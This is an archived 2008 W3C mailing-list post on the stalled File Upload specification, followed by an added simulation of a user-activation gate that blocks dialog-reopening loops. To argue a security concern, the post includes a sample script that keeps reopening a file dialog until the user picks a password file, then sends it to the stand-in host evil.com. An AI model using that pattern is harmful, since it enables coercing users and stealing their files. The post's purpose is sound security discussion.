- From: Jonas Sicking <jonas@sicking.cc>
- Date: Fri, 08 Aug 2008 02:56:09 -0700
- To: Garrett Smith <dhtmlkitchen@gmail.com>
- Cc: Web Applications Working Group WG <public-webapps@w3.org>
Garrett Smith wrote:
> The File object is useful for uploading files via XHR. It provides
> functionality for data to be retrieved from a file submitted to a
> form using the input type "file".
>
> It is currently a Working Draft:
> http://www.w3.org/TR/file-upload/
> http://dev.w3.org/2006/webapi/FileUpload/publish/FileUpload.html
>
> Implemented differently in Firefox 3.
> http://developer.mozilla.org/en/docs/nsIDOMFile
> https://bugzilla.mozilla.org/show_bug.cgi?id=371432
>
> An example in Firefox 3:
> http://dhtmlkitchen.com/ape/example/form/Form.html
>
> It is a useful feature for in-page file upload, without resorting
> to IFRAME hackery.
>
> What is the status of File Upload?
>
> Firefox 3's implementation is different than the w3c working draft. The
> spec author seems to have abandoned that, so now there's a working
> draft which seems to be collecting dust for a couple of years.
>
> What is going on with File Upload specification? It would be a useful
> feature, but with only a half-legged attempt at a spec that the author
> abandoned, and a different implementation in Firefox 3, other browsers
> probably won't implement this functionality any time soon. It's useful
> in Firefox 3, and would be even better if there were some mime-type
> sniffing (mediaType).
>
> There seems to be a need for failing test cases, so implementations
> can fill in the "???"'s. Any other suggestions for getting this thing
> done?
The spec only really supplies one feature over what Firefox 3 has: The
ability to open a file dialog strictly from Javascript without any UI
objects involved.
I'm not sure if this is a super desirable feature from a security point
of view. Technically speaking a site could take a user's browser hostage
unless the user agrees to give up a sensitive file:
    function checkForFile(e) {
      if (!e || !fileIsPasswordFile(e.fileList[0])) {
        // No file chosen yet, or not the wanted one: reopen the dialog
        alert("Give me your passw0rd file!");
        var fd = new FileDialog();
        fd.addEventListenerNS(
          "http://www.w3.org/ns/fs-event#", "files-selected", checkForFile,
          false);
        fd.open();
      }
      else {
        // Wanted file selected: send it to the attacker's server
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://evil.com/passwordsaver.cgi", false);
        xhr.send(e.fileList[0]);
      }
    }
    checkForFile();
Granted, there are certainly many ways to DoS a browser already
(while(1) alert('ha');) but the above is somewhat more sinister.
/ Jonas
Received on Friday, 8 August 2008 09:57:44 UTC
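The usual user-agent answer to the hostage loop Jonas sketches is to let a script open a file dialog only from a transient user activation (a real click) and to consume that activation when the dialog opens, so the callback for the dialog's result cannot reopen it. The following is an added example written for this archive page, not code from the thread or from any browser: it models that policy with a simulated user agent and runs the same re-opening loop against a gated and an ungated agent. `SimulatedUserAgent`, `openFileDialog`, `userClick` and the file names are all invented for the illustration; the `FileDialog` API from the draft is not used.

```javascript
// Added example, not from the mailing-list post. Models a user-agent
// policy: a file dialog opens only while a transient user activation is
// present, and opening it consumes the activation. All names here are
// assumptions for illustration, not a real browser API.

class SimulatedUserAgent {
  constructor(requireActivation) {
    this.requireActivation = requireActivation; // false = ungated agent
    this.hasTransientActivation = false;
    this.dialogsOpened = 0;
    this.log = [];
  }

  // A genuine click grants a transient activation for the duration of
  // the task that handles it.
  userClick(handler) {
    this.hasTransientActivation = true;
    try {
      handler();
    } finally {
      this.hasTransientActivation = false;
    }
  }

  // Opening the dialog consumes the activation, so a script cannot
  // reopen it from inside the dialog's own result callback.
  openFileDialog(onSelected, simulatedUserChoice) {
    if (this.requireActivation && !this.hasTransientActivation) {
      this.log.push("blocked: no user activation");
      return false;
    }
    this.hasTransientActivation = false;
    this.dialogsOpened += 1;
    this.log.push("dialog opened");
    onSelected(simulatedUserChoice);
    return true;
  }
}

// The re-opening loop from the thread, run against the simulated agent.
// The user always picks a harmless constructed file, so the script keeps
// asking. MAX_ATTEMPTS only exists so the ungated case terminates.
const MAX_ATTEMPTS = 5;

function runHostageLoop(ua, wantedName) {
  let attempts = 0;
  function checkForFile(choice) {
    attempts += 1;
    if (attempts >= MAX_ATTEMPTS) return;
    if (!choice || choice.name !== wantedName) {
      ua.openFileDialog(checkForFile, { name: "holiday.jpg" });
    }
  }
  ua.userClick(() =>
    ua.openFileDialog(checkForFile, { name: "holiday.jpg" })
  );
  return { attempts, dialogsOpened: ua.dialogsOpened, log: ua.log };
}

// Gated agent: one dialog, then every reopen attempt is blocked.
const gated = runHostageLoop(new SimulatedUserAgent(true), "passwords.txt");
// Ungated agent: the loop reopens the dialog until the demo cap.
const ungated = runHostageLoop(new SimulatedUserAgent(false), "passwords.txt");
console.log("gated:", gated.dialogsOpened, "ungated:", ungated.dialogsOpened);
```

The design point is that the activation is consumed on use rather than merely checked: a check alone would still let the result callback, which runs inside the same click task, open a second dialog.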